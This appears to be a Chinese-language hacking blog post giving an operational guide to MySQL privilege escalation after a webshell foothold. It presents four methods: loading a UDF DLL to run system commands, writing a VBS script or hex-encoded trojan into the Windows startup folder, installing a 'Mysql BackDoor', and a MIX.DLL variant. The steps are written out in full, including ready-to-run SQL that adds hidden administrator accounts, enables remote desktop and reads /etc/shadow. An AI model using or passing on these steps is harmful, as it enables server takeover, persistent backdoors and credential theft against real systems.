一UDF提权
1.通过WEBSHLL找到其网站数据库的链接配置信息,一般在config.ini.php文件下;
2.通过UDF.PHP提取专用马,填好所有的数据库链接信息进行链接:
3.udf.dll的利用条件:目标系统是Windows(Win2000,XP,Win2003);
你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数(MYSQL文档原语);有root账号密码。
4.上传udf.dll
a.小于mysql5.1版本
C:\\WINDOWS\\udf.dll 或 C:\\WINDOWS\\system32\\udf.dll 或C:\Windows\udf.dll
b.等于大于mysql5.1版本
%mysql%\\plugin\\udf.dll 用 select @@plugin_dir show variables like ‘%plugins%’查询plugin路径
默认路径: C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin\\udf.dll
如果找到mysql数据库的安装路径没有plugins目录可以添加lib/plugins目录;
Phpspy.php的Mysql上传(提示 "上传失败、原因:Result consisted of more than one row"、实际上大多数已上传成功),再连接mysql执行命令;Mysql允许外连的情况下也可以使用Hack MySQL上传,再通过命令行登陆执行命令。5.执行SQL语句
添加shell函数:create function cmdshell returns string soname ‘udf.dll’
添加用户:select cmdshell(‘net user backlion 123456 /add’);
提权用户:select cmdshell(‘net localgroup administrators backlion /add’);
查看管理员组:select cmdshell(‘net localgroup administrators ’);
查看IP地址:select cmdshell(‘ipconfig/all ’);
查看用户:select cmdshell(‘net user ’);
开启3389: select cmdshell(‘regedit /s d:/wwwrot/3389.reg’); 这里可以事先上传我们的开启3389的注册表到网站根目录
删除shell函数:drop function cmdshell;
二、VBS提权
二 VBS启动项提权
在SQL命令中执行如下:
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user iis_user 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators iis_user /add"",0) " );
select * from a into outfile "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\a.vbs";
先在webshell里连接上数据库,建立表,将VBS写入表里,然后导入启动项,如果UDF提权不行的话也可以尝试下这个方法,前提是要有ROOT权限,后面有个,0表示不弹出CMD窗口,安静的运行。
还可以这样写:
create table a (cmd BLOB);
insert into a values (CONVERT(木马的16进制代码,CHAR));
select * from a into dumpfile ’C:\Documents and Settings\All Users\「开始」菜单\程序启动\mm.exe’
drop table a;
执行前3条语句,就可以将木马写进启动里了,前提是木马一定要是16进制,还有就是路径要是\,因为windows会自动过滤掉一个
三 Linx Mysql BackDoor提权
Linx Mysql Door
Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,
该后门安装后为Mysql增加一个可以执行系统命令的"state"函数,
并且随Mysql进程启动一个基于Dll的嗅探型后门,这个后门在Windows下拥有与Mysql一样的系统权限,从而巧妙的实现了无端口,无进程,无服务的穿墙木马.
提取命令:
mysql -h localhost -uroot -p
system useradd backlion
system password 123456
system tail -l /etc/password
system tail -l /etc/shadow
四,MIX.DLL提权
create table temp_mix(abc longblob);
insert into temp_mix values(load_file('D:\\web\\udf.dll'));
select * from temp_mix into dumpfile 'C:\\Windows\\system32\\udf.dll';
create function MyCmd returns string soname 'udf.dll';
select MyCmd('net user');
drop table if exists temp_mix;
前三句主要目的是把DLL放到系统目录.第4句建立函数.然后就可以执行系统命令了。
而最容易出问题的就是第4句,可以将第四句换成:insert into mysql.func values('MyCmd',0,'udf.dll','function');
© hack-chengyu | Powered by LOFTER